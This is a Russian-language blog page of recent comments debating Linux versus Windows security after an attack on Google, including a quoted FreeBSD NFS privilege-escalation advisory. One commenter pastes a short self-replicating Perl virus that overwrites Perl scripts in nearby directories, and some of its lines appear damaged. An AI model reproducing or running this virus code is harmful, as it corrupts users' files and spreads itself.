Последние комментарии

Для меня эта страница - это удобный способ смотреть, что нового происходит в комментариях и сразу находить заметку, не заходя в админку. Думаю, она будет полезна и тебе.


Михаил Фленов

Если нужно будет скомпрометировать Google еще раз, то будут атакавать Linux, потому что в Гугле теперь большинство будет на нем.


olegmaster

Михаил Фленов


Атакавали Windows, потому что он самый популярный.

ой ли? цель была скомпромитриовать гуголь, а не m$ а уж заюзать дыры ie может любой китайский скрипткидди, на каждого по дыре хватит


Смотри предыдущую заметку: с ростом популярности и на безопасные (еще вчера) системы появляются вирусы, шпионыи прочая дрянь.

появляются != носят характер пандемий как от рустока, кидо, сассера и мсбласта.

вирус для никсов в несколько строк кода? да пожалуйста - заражай интерпретируемые файлы и делов-то:

#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=;
@Virus=@Virus[0...30];
close(File);

&InfectFile;
if (($^O =~ "bsd") or ($^O =~ "linux") or ($^O =~ "solaris")) { $OldDir =
pwd
} # Новая строка
if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = cd }
# Новая строка
$DotDot = '..';
# Новая строка
if ($^O =~ "MacOS") { $DotDot = "::" }
# Новая строка
chdir($DotDot);
# Новая строка
&InfectFile;
chdir($OldDir);
# Новая строка

sub InfectFile {
foreach $FileName (<*>) {
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName");
@Temp=;
close(File);
if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
open(File, ">$FileName");
print File @Virus;
print File @Temp;
close (File);
}}}}}

только толку-то от таких "вирусов"? все программы из репозитория. у каждого программного пакета есть мейнтенеры, которые тшательныо просматривают каждую строчку кода, которую коммитят люди со стороны. плюс на source-based дистрах добавляешь опции компилятору, повышающие безопансть - что еще больше усложнает жизнь всяким вирмейкерам. плюс зоопарк дистров в линуксе - ядро одно на всех,  а обвязки разные. что, например, может дать при большой популярности все-таки разброс по разным убунтам, сусям, федорам и опять же писать вирус невыгодно - нужно будет уметь писать ядерные вирусы, а это резко повышает порог вхождения вирусописателя, никаких скрипткидди, юзающим метасплоит это не под силу, а сейчас вирусы берут не качеством, а количеством .

какая сейчас основная схема распространения малвари - скочал (с торрента/файлооменника), запустил, заразил. в линуксе такая схема не проканывает. единственный путь - javascript'ы для браузера да документы типа pdf'а всякие. первый вирус для убунты пройдет именно таким путем



Китайцев достаточно, чтобы завтра атакавать Linux и MacOSX. Что же теперь после каждой атаки бежать на друю ОС?

ну вообще-то компроментация рабочих мыльников сотрудников гугла - это не "каждая" атака. а если понадобится то да, побегут. а когда некуда будет бежать - свою напишут, с блекджеком и женщинами.


А если почитать эту новость: opensource.aaanet.ru/2007/08/16/hack-ubuntu-servers, то можно уже сейчас валить куда-нибудь.

не путай. от DDoS атаки на сервер никто не застрахован, здесь уж у кого либо ботнет (кстати на винде построен) больше, либо канал толще. подумаешь, некоторое время убунтовцы не могли качать свою любимый дистр. не велика потеря, по бумажной почте пришлют))
а вот пустить хакера в свой огород... электронный ящик - может обернуться серьезными убытками для компании.


В FireFox уязвимости находят почти каждый месяц.

у гугла есть свой браузер, там уязвимостей меньше чем в лисе хотя бы потому, что они версии и движок штампуют чуть ли не каждый месяц, элементарно не успевают хакеры дыры юзать)


Влад

Нашёл не очень удобную особенность WPF. При изменении свойства ResizeMode формы, если оно установлено как CanResizeWithGrip, на другое - например NoResize, или наоборот происходит событие Grid_Loaded.
Мой самодельный видеопроигрыватель на WPF имеет
выпадающий список, с адресами веб-камер,который загружается при запуске программы. Есть флажок, заставляющий окно принимать фиксированный размер, соответствующий размеру видео.
Я долго не мог понять,почему мой выпадающий список в ComboBox удваивается, когда я меняю свойство формы. Думал, что нашёл "ужасный глюк" в WPF. Впрочем, поменял событие на Window_Loaded и болезнь прошла.
    В том же MFC как-то обнаружил подводный камень. Заключался он, по-моему, в том, что в диалоговом окне не удавалось ловить сообщение от клавиатуры. Конструктор генерирует обработчик события, который ничерта не ловит.
Нашёл способ решения проблемы на каком-то французком сайте. Впрочем, бросил я изучать MFC, так как всё что мне нужно, можно написать на том же .NET в бесплатной среде разработки, а MFC сильно портит нервы. Прямо, кровавые слёзы.


Михаил Фленов

В наше время абсолютной безопасности не может себя чувствовать как линуксоид так и пользователь Windows.


Золотые слова, которые хорошо описывают заметку. Спысивать на ОС бесполезно, потому что основной проблемой безопасности является тот, кто сидит напротив монитора.


vasek123

2. это где это грамотная политика прав? ты не слышал о багах, которые постоянно появляются в Linux и позволяют поднять права?


Плохо вы информированны...


Повышение привилегий в NFS клиенте FreeBSD

01 июня, 2010

Программа: FreeBSD 7.2, 7.3, 8.0

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за недостаточной обработки длины параметра в NFS клиенте, передаваемого пользователем во время монтирования файловой системы. Локальный пользователь с привилегиями на монтирование файловой системы может с помощью слишком длинного параметра выполнить произвольный код на системе с привилегиями суперпользователя.

URL производителя: www.freebsd.org

Решение: Установите исправление с сайта производителя.


http://security.FreeBSD.org/patches/SA-10:06/nfsclient.patch
http://security.FreeBSD.org/patches/SA-10:06/nfsclient.patch.asc


Источники:  
FreeBSD-SA-10:06.nfsclient: Unvalidated input in nfsclient

CVE:  
CVE-2010-2020


p.s. В наше время абсолютной безопасности не может себя чувствовать как линуксоид так и пользователь Windows.


Михаил Фленов

Если заразы нет, то это не значит, что ее не может быть. Это значит, что просто никому не нужно. MacOS стала интересна хакерам и зараза стала появлятся, не смотря на то, что внутренности от BSD, изменена только графическая система.


nektoDev

@notex
1. xxx: Народ! Подскажите какой-нить антивирус на debian?
yyy: Рабочих вирусов на линукс в данный момент нет. Нафиг тебе антивирус?
xxx: Это их раньше не было, я один нашел... и наконец-то пересобрал в работающем состоянии...
(С) bash.org.ru

http://goo.gl/HNe8 - список известных вирусов под Линукс. Ни один из них не работает на ядре выше 2.6

P.S. Попробуйте найти хоть один работающий вирус который САМ бы распоковался и скомплировал под, допустим Debianом и SUSE.

2. Последний по вине ядра, на моей памяти был в октябре-ноябре того года. Да и дырки все закрываются с максимальной оперативность, порой даже до выхода в паблик.


Михаил Фленов

Если выбирать за безопасность, я наверно выбрал бы BSD или Apple. Не смотря на свои проблемы на верхнем уровне, Apple все же построен на очень безопасной BSD платформе.


pat

Не знаю 2 года работаю только в Ubuntu. Вполне доволен безопасность. Никакого тупого антивируса. Да и работа стабильная. А в Google многие давно работают в Linux.

Остается 1 вопрос, девелоперы, которые фигарят под Windows они как??


Михаил Фленов

В любом случае, ты можешь использовать даже unicode и это будет мегабезопасно


О блоге

Программист, автор нескольких книг серии глазами хакера и просто блогер. Интересуюсь безопасностью, хотя хакером себя не считаю

Обратная связь

Без проблем вступаю в неразборчивые разговоры по e-mail. Стараюсь отвечать на письма всех читателей вне зависимости от страны проживания, вероисповедания, на русском или английском языке.

Пишите мне